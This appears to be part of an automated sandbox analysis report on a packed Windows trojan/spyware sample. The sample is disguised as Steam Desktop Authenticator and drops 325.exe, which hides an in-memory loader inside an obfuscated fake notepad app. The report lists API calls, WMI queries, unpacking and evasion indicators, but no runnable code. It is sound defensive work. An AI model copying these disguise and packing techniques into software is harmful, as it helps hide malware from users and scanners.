                    Source: kS2dqbsDwD.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: kS2dqbsDwD.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: kS2dqbsDwD.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 325.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: kS2dqbsDwD.exe, 00000000.00000002.306945204.0000000000880000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs kS2dqbsDwD.exe
                    Source: kS2dqbsDwD.exe, 00000000.00000000.201076729.000000014013D000.00000008.00020000.sdmpBinary or memory string: OriginalFilenameSteam Desktop Authenticator.exeX vs kS2dqbsDwD.exe
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307696663.0000000002C1A000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameOtxiH.exe2 vs kS2dqbsDwD.exe
                    Source: kS2dqbsDwD.exe, 00000000.00000002.306924616.0000000000850000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs kS2dqbsDwD.exe
                    Source: kS2dqbsDwD.exeBinary or memory string: OriginalFilenameSteam Desktop Authenticator.exeX vs kS2dqbsDwD.exe
                    Source: 325.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: kS2dqbsDwD.exeStatic PE information: Section: .MPRESS1 ZLIB complexity 1.00031240161
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/29@9/5
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140036D50 CreateProcessW,CloseHandle,CloseHandle,GetLastError,SetCurrentDirectoryW,GetFileAttributesW,SetCurrentDirectoryW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,GetLastError,FormatMessageW,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400624E0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400C22C0 GetDiskFreeSpaceW,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140088BA0 LoadLibraryExW,EnumResourceNamesW,FindResourceW,LoadResource,LockResource,GetSystemMetrics,FindResourceW,LoadResource,LockResource,SizeofResource,CreateIconFromResourceEx,FreeLibrary,ExtractIconW,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeFile created: C:\Users\user\AppData\Roaming\fieldJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeFile created: C:\Users\user\AppData\Local\Temp\tmpBE63.tmpJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\325.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\325.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\325.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\AppData\Roaming\325.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: kS2dqbsDwD.exeVirustotal: Detection: 20%
                    Source: kS2dqbsDwD.exeReversingLabs: Detection: 13%
                    Source: unknownProcess created: C:\Users\user\Desktop\kS2dqbsDwD.exe 'C:\Users\user\Desktop\kS2dqbsDwD.exe'
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeProcess created: C:\Users\user\AppData\Roaming\325.exe C:\Users\user\AppData\Roaming\325.exe 325
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess created: C:\Users\user\AppData\Roaming\325.exe {path}
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeProcess created: C:\Users\user\AppData\Roaming\325.exe C:\Users\user\AppData\Roaming\325.exe 325
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess created: C:\Users\user\AppData\Roaming\325.exe {path}
                    Source: C:\Users\user\AppData\Roaming\325.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\AppData\Roaming\325.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: kS2dqbsDwD.exeStatic PE information: Image base 0x140000000 > 0x60000000

                    Data Obfuscation:

                    barindex
                    Detected unpacking (changes PE section rights)Show sources
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeUnpacked PE file: 0.2.kS2dqbsDwD.exe.140000000.2.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                    .NET source code contains potential unpackerShow sources
                    Source: 325.exe.0.dr, uNotepad/Form1.cs.Net Code: TJbSoEaROH1pxHedh9d System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/Form1.cs.Net Code: TJbSoEaROH1pxHedh9d System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/Form1.cs.Net Code: TJbSoEaROH1pxHedh9d System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/Form1.cs.Net Code: TJbSoEaROH1pxHedh9d System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140060290 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetOpenW,InternetOpenUrlW,FreeLibrary,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,InternetCloseHandle,FreeLibrary,DeleteFileW,FreeLibrary,
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .MPRESS2
                    Source: kS2dqbsDwD.exeStatic PE information: real checksum: 0x9a0ca should be: 0xa1dfe
                    Source: 325.exe.0.drStatic PE information: real checksum: 0x0 should be: 0xf8b72
                    Source: kS2dqbsDwD.exeStatic PE information: section name: .MPRESS1
                    Source: kS2dqbsDwD.exeStatic PE information: section name: .MPRESS2
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0095CF80 push eax; iretd
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0095CF80 push eax; iretd
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0095CF80 push eax; iretd
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0095CD08 pushad ; retf
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0095CD08 pushad ; retf
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0095CD08 pushad ; retf
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0095F2A3 push esi; retf 0000h
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0095F2A3 push esi; retf 0000h
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0095F2A3 push esi; retf 0000h
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0099BAD8 push esi; retn 0000h
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0099BAD8 push esi; retn 0000h
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0099BAD8 push esi; retn 0000h
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0099CACC push esp; ret
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0099CACC push esp; ret
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0099CACC push esp; ret
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0099D9FB push edi; ret
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0099D9FB push edi; ret
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0099D9FB push edi; ret
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0099DF01 push ds; iretd
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0099DF01 push ds; iretd
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0099DF01 push ds; iretd
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_00993723 pushfd ; ret
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_00993723 pushfd ; ret
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_00993723 pushfd ; ret
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0099DA4B push edi; ret
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0099DA4B push edi; ret
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0099DA4B push edi; ret
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_00996762 push es; retn 0002h
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_00996762 push es; retn 0002h
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_00996762 push es; retn 0002h
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0095CF80 push eax; iretd
                    Source: initial sampleStatic PE information: section name: .MPRESS1 entropy: 7.99951858505
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.5685116349
                    Source: 325.exe.0.dr, uNotepad/Form_Main.csHigh entropy of concatenated method names: '.ctor', 'ResizeControls', 'Form_Main_Load', 'Form_Main_FormClosing', 'button_Convert_Click', 'Form_Main_Resize', 'button_Select_Click', 'button_Clear_Click', 'Form_Main_DragEnter', 'Form_Main_DragDrop'
                    Source: 325.exe.0.dr, uNotepad/MDSDDD.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'InitializeComponent', 'xQYrXMQK3oruP2n78EE', 'qI2V5sQmkMFPdZKK7RT', 'v2BxR9Q29gDG9OoMaun', 'Oy6h3XQJUWJ0pO5lsiJ', 'lvpUrfQFbZ41gMl8ChU', 'V9TqPbQ9L1478wb6Rri', 'AsM2hEQPFjt8MQXoJBn'
                    Source: 325.exe.0.dr, uNotepad/MainWindow.csHigh entropy of concatenated method names: '.ctor', 'Draw', 'ChooseFillType', 'StartSorting', 'Sorting', 'Sorting2', 'DisableControls', 'EnableControls', 'txtbSwapCost_TextChanged', 'txtbSwapCost2_TextChanged'
                    Source: 325.exe.0.dr, uNotepad/Form1.csHigh entropy of concatenated method names: '.ctor', 'AddFormToTabPage', 'Form1_Load', 'toolButtonNew_Click', 'toolButtonSave_Click', 'toolButtonOpen_Click', 'kapatToolStripMenuItem_Click', 'yaziRengiToolStripMenuItem_Click', 'yaziTipiToolStripMenuItem_Click', 'hepsiBuyukToolStripMenuItem_Click'
                    Source: 325.exe.0.dr, uNotepad/CollectionToSort.csHigh entropy of concatenated method names: 'set_ModSwapCost', 'set_ModComparisonCost', '.ctor', 'BubbleSort', 'InsertionSort', 'SelectionSort', 'Merge', 'MergeSort', 'ShellSort', 'CombSort'
                    Source: 325.exe.0.dr, uNotepad/uNote.csHigh entropy of concatenated method names: '.ctor', 'get_fileName', 'set_fileName', 'Kaydet', 'DosyaAc', 'YaziRengiDegistir', 'YaziTipiDegistir', 'YaziBuyukHarfYap', 'YaziKucukHarfYap', 'Ara'
                    Source: 325.exe.0.dr, uNotepad/AramaFormu.csHigh entropy of concatenated method names: '.ctor', 'btnAra_Click', 'btnIptal_Click', 'Dispose', 'InitializeComponent', 'vq7PjyhUAd7MRkefWD', 'QoZQYfS9Radq0iYew9', 'HW5Pmc0r3FxacGfIMM', 'eR5IKkXfgPFddBVEtT', 'fqFEGAbrnWeHxXrodt'
                    Source: 325.exe.0.dr, uNotepad/CollectionOfElements.csHigh entropy of concatenated method names: 'get_GetPictureBox', 'get_modBuffer', 'getElementValue', 'getElementSepperation', 'getElementWidth', 'getElementColor', 'get_modHeight', 'get_modNumberOfElements', '.ctor', 'DrawElements'
                    Source: 325.exe.0.dr, uNotepad/About.csHigh entropy of concatenated method names: '.ctor', 'btnOK_Click', 'Dispose', 'InitializeComponent', 'O7iYVnQ8fijTtIhHIa', 'LobEx4sRuX3pYvhqG1', 'wDtNXwHRAUHdKDIewc', 'Bjwo1gT75dUFXW4TKT', 'OHgtsoIUhxi7DTZZsj', 'FYQft6BgvEERMwMpIU'
                    Source: 325.exe.0.dr, uNotepad/TextUtility.csHigh entropy of concatenated method names: 'LoadTextToTextBox', 'QBTcamIJwnfhXp5d0d3', 'ykja5WIFRtXhAOiwvuL', 'rTCUjqI95QdxLALSyjg', 'mj4y5GIPVV7aGuQsJp4', 'WihXS9I2YQbW7IsCipf', 'tRp4m3IKYO0jK390DjC'
                    Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/Form_Main.csHigh entropy of concatenated method names: '.ctor', 'ResizeControls', 'Form_Main_Load', 'Form_Main_FormClosing', 'button_Convert_Click', 'Form_Main_Resize', 'button_Select_Click', 'button_Clear_Click', 'Form_Main_DragEnter', 'Form_Main_DragDrop'
                    Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/MDSDDD.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'InitializeComponent', 'xQYrXMQK3oruP2n78EE', 'qI2V5sQmkMFPdZKK7RT', 'v2BxR9Q29gDG9OoMaun', 'Oy6h3XQJUWJ0pO5lsiJ', 'lvpUrfQFbZ41gMl8ChU', 'V9TqPbQ9L1478wb6Rri', 'AsM2hEQPFjt8MQXoJBn'
                    Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/Form1.csHigh entropy of concatenated method names: '.ctor', 'AddFormToTabPage', 'Form1_Load', 'toolButtonNew_Click', 'toolButtonSave_Click', 'toolButtonOpen_Click', 'kapatToolStripMenuItem_Click', 'yaziRengiToolStripMenuItem_Click', 'yaziTipiToolStripMenuItem_Click', 'hepsiBuyukToolStripMenuItem_Click'
                    Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/MainWindow.csHigh entropy of concatenated method names: '.ctor', 'Draw', 'ChooseFillType', 'StartSorting', 'Sorting', 'Sorting2', 'DisableControls', 'EnableControls', 'txtbSwapCost_TextChanged', 'txtbSwapCost2_TextChanged'
                    Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/CollectionToSort.csHigh entropy of concatenated method names: 'set_ModSwapCost', 'set_ModComparisonCost', '.ctor', 'BubbleSort', 'InsertionSort', 'SelectionSort', 'Merge', 'MergeSort', 'ShellSort', 'CombSort'
                    Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/About.csHigh entropy of concatenated method names: '.ctor', 'btnOK_Click', 'Dispose', 'InitializeComponent', 'O7iYVnQ8fijTtIhHIa', 'LobEx4sRuX3pYvhqG1', 'wDtNXwHRAUHdKDIewc', 'Bjwo1gT75dUFXW4TKT', 'OHgtsoIUhxi7DTZZsj', 'FYQft6BgvEERMwMpIU'
                    Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/AramaFormu.csHigh entropy of concatenated method names: '.ctor', 'btnAra_Click', 'btnIptal_Click', 'Dispose', 'InitializeComponent', 'vq7PjyhUAd7MRkefWD', 'QoZQYfS9Radq0iYew9', 'HW5Pmc0r3FxacGfIMM', 'eR5IKkXfgPFddBVEtT', 'fqFEGAbrnWeHxXrodt'
                    Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/CollectionOfElements.csHigh entropy of concatenated method names: 'get_GetPictureBox', 'get_modBuffer', 'getElementValue', 'getElementSepperation', 'getElementWidth', 'getElementColor', 'get_modHeight', 'get_modNumberOfElements', '.ctor', 'DrawElements'
                    Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/TextUtility.csHigh entropy of concatenated method names: 'LoadTextToTextBox', 'QBTcamIJwnfhXp5d0d3', 'ykja5WIFRtXhAOiwvuL', 'rTCUjqI95QdxLALSyjg', 'mj4y5GIPVV7aGuQsJp4', 'WihXS9I2YQbW7IsCipf', 'tRp4m3IKYO0jK390DjC'
                    Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/uNote.csHigh entropy of concatenated method names: '.ctor', 'get_fileName', 'set_fileName', 'Kaydet', 'DosyaAc', 'YaziRengiDegistir', 'YaziTipiDegistir', 'YaziBuyukHarfYap', 'YaziKucukHarfYap', 'Ara'
                    Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/Form_Main.csHigh entropy of concatenated method names: '.ctor', 'ResizeControls', 'Form_Main_Load', 'Form_Main_FormClosing', 'button_Convert_Click', 'Form_Main_Resize', 'button_Select_Click', 'button_Clear_Click', 'Form_Main_DragEnter', 'Form_Main_DragDrop'
                    Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/MDSDDD.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'InitializeComponent', 'xQYrXMQK3oruP2n78EE', 'qI2V5sQmkMFPdZKK7RT', 'v2BxR9Q29gDG9OoMaun', 'Oy6h3XQJUWJ0pO5lsiJ', 'lvpUrfQFbZ41gMl8ChU', 'V9TqPbQ9L1478wb6Rri', 'AsM2hEQPFjt8MQXoJBn'
                    Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/Form1.csHigh entropy of concatenated method names: '.ctor', 'AddFormToTabPage', 'Form1_Load', 'toolButtonNew_Click', 'toolButtonSave_Click', 'toolButtonOpen_Click', 'kapatToolStripMenuItem_Click', 'yaziRengiToolStripMenuItem_Click', 'yaziTipiToolStripMenuItem_Click', 'hepsiBuyukToolStripMenuItem_Click'
                    Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/MainWindow.csHigh entropy of concatenated method names: '.ctor', 'Draw', 'ChooseFillType', 'StartSorting', 'Sorting', 'Sorting2', 'DisableControls', 'EnableControls', 'txtbSwapCost_TextChanged', 'txtbSwapCost2_TextChanged'
                    Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/CollectionToSort.csHigh entropy of concatenated method names: 'set_ModSwapCost', 'set_ModComparisonCost', '.ctor', 'BubbleSort', 'InsertionSort', 'SelectionSort', 'Merge', 'MergeSort', 'ShellSort', 'CombSort'
                    Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/CollectionOfElements.csHigh entropy of concatenated method names: 'get_GetPictureBox', 'get_modBuffer', 'getElementValue', 'getElementSepperation', 'getElementWidth', 'getElementColor', 'get_modHeight', 'get_modNumberOfElements', '.ctor', 'DrawElements'
                    Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/AramaFormu.csHigh entropy of concatenated method names: '.ctor', 'btnAra_Click', 'btnIptal_Click', 'Dispose', 'InitializeComponent', 'vq7PjyhUAd7MRkefWD', 'QoZQYfS9Radq0iYew9', 'HW5Pmc0r3FxacGfIMM', 'eR5IKkXfgPFddBVEtT', 'fqFEGAbrnWeHxXrodt'
                    Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/About.csHigh entropy of concatenated method names: '.ctor', 'btnOK_Click', 'Dispose', 'InitializeComponent', 'O7iYVnQ8fijTtIhHIa', 'LobEx4sRuX3pYvhqG1', 'wDtNXwHRAUHdKDIewc', 'Bjwo1gT75dUFXW4TKT', 'OHgtsoIUhxi7DTZZsj', 'FYQft6BgvEERMwMpIU'
                    Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/TextUtility.csHigh entropy of concatenated method names: 'LoadTextToTextBox', 'QBTcamIJwnfhXp5d0d3', 'ykja5WIFRtXhAOiwvuL', 'rTCUjqI95QdxLALSyjg', 'mj4y5GIPVV7aGuQsJp4', 'WihXS9I2YQbW7IsCipf', 'tRp4m3IKYO0jK390DjC'
                    Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/uNote.csHigh entropy of concatenated method names: '.ctor', 'get_fileName', 'set_fileName', 'Kaydet', 'DosyaAc', 'YaziRengiDegistir', 'YaziTipiDegistir', 'YaziBuyukHarfYap', 'YaziKucukHarfYap', 'Ara'
                    Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/Form_Main.csHigh entropy of concatenated method names: '.ctor', 'ResizeControls', 'Form_Main_Load', 'Form_Main_FormClosing', 'button_Convert_Click', 'Form_Main_Resize', 'button_Select_Click', 'button_Clear_Click', 'Form_Main_DragEnter', 'Form_Main_DragDrop'
                    Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/MDSDDD.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'InitializeComponent', 'xQYrXMQK3oruP2n78EE', 'qI2V5sQmkMFPdZKK7RT', 'v2BxR9Q29gDG9OoMaun', 'Oy6h3XQJUWJ0pO5lsiJ', 'lvpUrfQFbZ41gMl8ChU', 'V9TqPbQ9L1478wb6Rri', 'AsM2hEQPFjt8MQXoJBn'
                    Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/Form1.csHigh entropy of concatenated method names: '.ctor', 'AddFormToTabPage', 'Form1_Load', 'toolButtonNew_Click', 'toolButtonSave_Click', 'toolButtonOpen_Click', 'kapatToolStripMenuItem_Click', 'yaziRengiToolStripMenuItem_Click', 'yaziTipiToolStripMenuItem_Click', 'hepsiBuyukToolStripMenuItem_Click'
                    Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/MainWindow.csHigh entropy of concatenated method names: '.ctor', 'Draw', 'ChooseFillType', 'StartSorting', 'Sorting', 'Sorting2', 'DisableControls', 'EnableControls', 'txtbSwapCost_TextChanged', 'txtbSwapCost2_TextChanged'
                    Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/CollectionToSort.csHigh entropy of concatenated method names: 'set_ModSwapCost', 'set_ModComparisonCost', '.ctor', 'BubbleSort', 'InsertionSort', 'SelectionSort', 'Merge', 'MergeSort', 'ShellSort', 'CombSort'
                    Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/CollectionOfElements.csHigh entropy of concatenated method names: 'get_GetPictureBox', 'get_modBuffer', 'getElementValue', 'getElementSepperation', 'getElementWidth', 'getElementColor', 'get_modHeight', 'get_modNumberOfElements', '.ctor', 'DrawElements'
                    Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/About.csHigh entropy of concatenated method names: '.ctor', 'btnOK_Click', 'Dispose', 'InitializeComponent', 'O7iYVnQ8fijTtIhHIa', 'LobEx4sRuX3pYvhqG1', 'wDtNXwHRAUHdKDIewc', 'Bjwo1gT75dUFXW4TKT', 'OHgtsoIUhxi7DTZZsj', 'FYQft6BgvEERMwMpIU'
                    Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/AramaFormu.csHigh entropy of concatenated method names: '.ctor', 'btnAra_Click', 'btnIptal_Click', 'Dispose', 'InitializeComponent', 'vq7PjyhUAd7MRkefWD', 'QoZQYfS9Radq0iYew9', 'HW5Pmc0r3FxacGfIMM', 'eR5IKkXfgPFddBVEtT', 'fqFEGAbrnWeHxXrodt'
                    Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/TextUtility.csHigh entropy of concatenated method names: 'LoadTextToTextBox', 'QBTcamIJwnfhXp5d0d3', 'ykja5WIFRtXhAOiwvuL', 'rTCUjqI95QdxLALSyjg', 'mj4y5GIPVV7aGuQsJp4', 'WihXS9I2YQbW7IsCipf', 'tRp4m3IKYO0jK390DjC'
                    Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/uNote.csHigh entropy of concatenated method names: '.ctor', 'get_fileName', 'set_fileName', 'Kaydet', 'DosyaAc', 'YaziRengiDegistir', 'YaziTipiDegistir', 'YaziBuyukHarfYap', 'YaziKucukHarfYap', 'Ara'
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeFile created: C:\Users\user\AppData\Roaming\325.exeJump to dropped file
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014008B0A0 GetForegroundWindow,IsWindowVisible,IsIconic,ShowWindow,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400881E0 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014008B280 GetWindowThreadProcessId,GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,BringWindowToTop,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014005E330 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,CreateDCW,GetDC,GetPixel,DeleteDC,ReleaseDC,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140075850 SetDlgItemTextW,IsZoomed,IsIconic,ShowWindow,IsIconic,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,GetWindowRect,GetWindowLongW,GetWindowRect,GetClientRect,IsWindowVisible,GetWindowLongW,GetWindowLongW,GetMenu,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SystemParametersInfoW,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,SetFocus,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140075850 SetDlgItemTextW,IsZoomed,IsIconic,ShowWindow,IsIconic,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,GetWindowRect,GetWindowLongW,GetWindowRect,GetClientRect,IsWindowVisible,GetWindowLongW,GetWindowLongW,GetMenu,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SystemParametersInfoW,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,SetFocus,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140044A00 IsDlgButtonChecked,IsWindowVisible,ShowWindow,IsIconic,ShowWindow,GetForegroundWindow,SetForegroundWindow,IsDlgButtonChecked,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140071A10 GetWindowLongW,GetWindowLongW,SetWindowPos,EnableWindow,GetWindowRect,GetClientRect,MulDiv,MulDiv,GetWindowRect,GetWindowRect,GetClientRect,MulDiv,MulDiv,GetWindowRect,IsWindow,SetParent,SetWindowLongPtrW,SetParent,IsWindowVisible,IsIconic,SetWindowLongW,SetWindowLongW,SetWindowPos,InvalidateRect,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400C2BE0 IsIconic,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140040D29 IsZoomed,IsIconic,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140079D90 IsDlgButtonChecked,GetWindowLongW,IsWindowVisible,IsIconic,GetFocus,GetWindowRect,IsDlgButtonChecked,GetWindowLongW,ShowWindow,EnableWindow,EnableWindow,GetWindowRect,PtInRect,PtInRect,SetFocus,IsDlgButtonChecked,SetFocus,MapWindowPoints,InvalidateRect,
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX
